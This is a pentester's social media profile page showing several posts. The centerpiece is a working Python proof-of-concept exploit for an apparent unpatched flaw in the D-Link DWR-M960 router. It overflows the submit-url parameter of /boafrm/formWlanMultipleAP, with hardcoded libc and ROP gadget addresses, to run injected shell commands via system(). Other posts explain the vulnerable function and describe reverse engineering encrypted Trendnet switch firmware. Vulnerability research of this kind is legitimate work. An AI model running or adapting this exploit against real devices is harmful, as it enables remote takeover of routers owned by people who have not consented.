Clathetic

@[email protected]
24 Followers
58 Following
134 Posts
Pentest, OSINT, reverse engineering, RCE/LPE addict.
My name is Johnny Clathetic.
Dark thought and weird to understand jokes. "If you don't understand, assume that I'm dumb."
https://heapdump.alwaysdata.net/
ClatheticFeb 25

and here is the POC, ugly, but working:
```
#! /usr/bin/python3

import requests
import sys

# just auth with a browsre and grab cookie
# the js code is awful, I'm too bored to reverse it
cookies = {"webuicookie":sys.argv[1]}
host="http://127.0.0.1" #adjust

# We need to browse /wlmultipleap.htm first
page1="/wlmultipleap.htm"
# otherwise form is not accessible
page2="/boafrm/formWlanMultipleAP"

r = requests.get(host+page1, cookies=cookies)
hdr={"Content-Type": "application/x-www-form-urlencoded"}

data="wlanIdx=wlanidx&wl_ssid1=wl_ssid&submit-url="
data = data+"%2f"+"aa;echo dlink dwrM960_is_pwned>/tmp/pwn; id >> /tmp/pwn;"+"a"*209
data = data+"%e8%50%d5%3F" #system() @ in libc : 0x3fd25000+0x300E8 : s0 register
data = data+"aaaaaabaacaadaaeaafaagaahaaiaaja" #pad
data = data+"%1C%F4%D3%3F" #gadget@ move t9,s0; jalr t9, lw a0,64(sp)
data = data+"akaalaamaanaaoaapaaqaaraasaataauaavaawaaxaayaazabaabbabcabdabeab" #pad
data = data+"%C8%01%80%40" #stack addr 0x408001c8
data = data+"fabgabhabiabjabkablabmabnaboabpabqabrabsabtabuabvabwabxabyabzacaacbaccacdaceacfacgachaciacjackaclacmac.htm" #pad

r = requests.post(host+page2, cookies=cookies, headers=hdr, data=data)
```
In my poc, i wanted to do:
`echo dlink dwrM960_is_pwned>/tmp/pwn; id >> /tmp/pwn;`
but the id applet is not compiled in the busybox :D :D

Show threadClatheticFeb 25
is it a #0day ? yeah I guess?
The sub_455480 function is flawed. This function parses some data sent to boafrm/formWlanMultipleAP. Guess what it does with the submit-url parameter? Yep, printf to a stack var. We can't use null bytes, but libc is loaded at 0x3fd25000 so it's not a problem (and ASLR/PIE is nonexistent on those small routers), so everything can be hardcoded.
ClatheticFeb 25
at last. Finally got RCE on the DLINK DWR M960
Show threadClatheticFeb 24
look a this:
ClatheticFeb 24

this one is really weird… I’ve been trying to reproduce this:
https://github.com/LX-66-LX/cve-new/issues/28

and I swear I had to pull some magical gdb shenanigans just to make boa start at all. meanwhile this guy just clicks “go” and it works? look at his screen! and I feel like I’m missing some fundamental brain cell everyone else got at birth.

Now what, overflow with text only to pivot from $pc control to a real exploit? Story will follow soon. I have a strange feeling about this.

Show threadClatheticFeb 1
"Cutting edge AI-driven reverse engineering tools"
ClatheticFeb 1
Cutting-Edge AI tools 😂 dudes just learn the "grep" command?
Show threadClatheticJan 25

And who calls this function?
CmFWImgDecryptHandler.

Yes. Literally “firmware image decrypt handler”. Subtle.

This is good. This is hope. And somehow (against all odds) we even get the key, see image.

At this point, we have choices. None of them feel good.

We can download aescrypt and try to decrypt the file directly → it fails. Of course it does. Trendnet must have tweaked something in the algorithm.

We can reimplement the code in Python → because I am lazy and tired, I ask ChatGPT to translate the C code. It fails. I try Claude. I try Mistral. All three translations are different. None of them work. Incredible.

Or… we can just ask ISS.exe to decrypt the file for us.

We pick the path of least dignity.

Show threadClatheticJan 25
So let’s open ISS.exe and look for something—anything—related to aescrypt. And yes, buried in there, we find a function named decrypt_stream, complete with sanity checks on the aescrypt header:
ClatheticJan 25

Here is the story. Or at least what’s left of it after too much coffee and not enough sleep.

I was doom-scrolling vendor websites when I noticed the Trendnet TEG switches. They let you download the firmware, which already felt like a small miracle. So I grabbed the first thing I saw:

<i>Web Smart L2+ Firmware Release Notes
Model: TEG-204WS, TEG-284WS, TEG-524WS, TPE-082WS, TPE-204US, TPE-5028WS, TPE-5048WS, TPE-5240WS, TPE-1620WSF, TPE-1021WS
H/W Version: v1.0R
Model: TEG-082WS, TPE-1620WS, TPE-2840WS
H/W Version: v2.0R</i>

Looks fine. Clean. Promising. Of course, reality immediately intervenes: the firmware is encrypted.
Great. Fantastic. Love that for me.